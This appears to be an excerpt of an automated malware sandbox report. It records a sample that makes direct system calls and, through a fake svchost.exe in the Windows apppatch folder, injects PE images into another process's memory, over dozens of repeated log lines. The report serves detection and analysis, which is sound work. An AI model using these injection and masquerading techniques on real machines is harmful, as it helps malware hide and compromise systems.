Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	NtDeviceIoControlFile: Direct from: 0x77382AEC
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	NtCreateFile: Direct from: 0x77382FEC
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	NtOpenFile: Direct from: 0x77382DCC
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	NtEnumerateValueKey: Direct from: 0x77382BAC
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	NtSetTimerEx: Direct from: 0x77377B2E

Injects a PE file into a foreign processes

Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 16E2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2FA2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 14C2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2922000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2792000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2652000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 5E2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2B92000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2D12000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2792000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: BD2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2202000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2472000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 13D2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2862000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2CA2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2472000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1562000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: E52000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: AD2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2232000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2152000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2F32000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 9F2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2F22000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 15A2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 26D2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: DF2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2742000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1072000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 29D2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: C32000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 11F2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 27C2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 28E2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: DD2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: EE2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: BF2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: DC2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1322000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 902000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: B92000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1622000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 902000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 952000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: D42000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 14A2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 802000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 762000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1312000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: C42000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 822000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: A72000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1042000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 11C2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1502000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1422000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1552000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 772000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: DB2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: BF2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1462000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 10F2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 802000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: A12000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 12A2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: F92000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1122000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: B52000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 13A2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 10C2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: FB2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: D22000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1032000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1212000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: AC2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 8D2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 622000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: A42000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 802000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1192000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1032000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 932000 value starts with: 4D5A	Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 16E0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 16E1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 16E2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1732000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2FA0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2FA1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2FA2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2FF2000	Jump to behavior
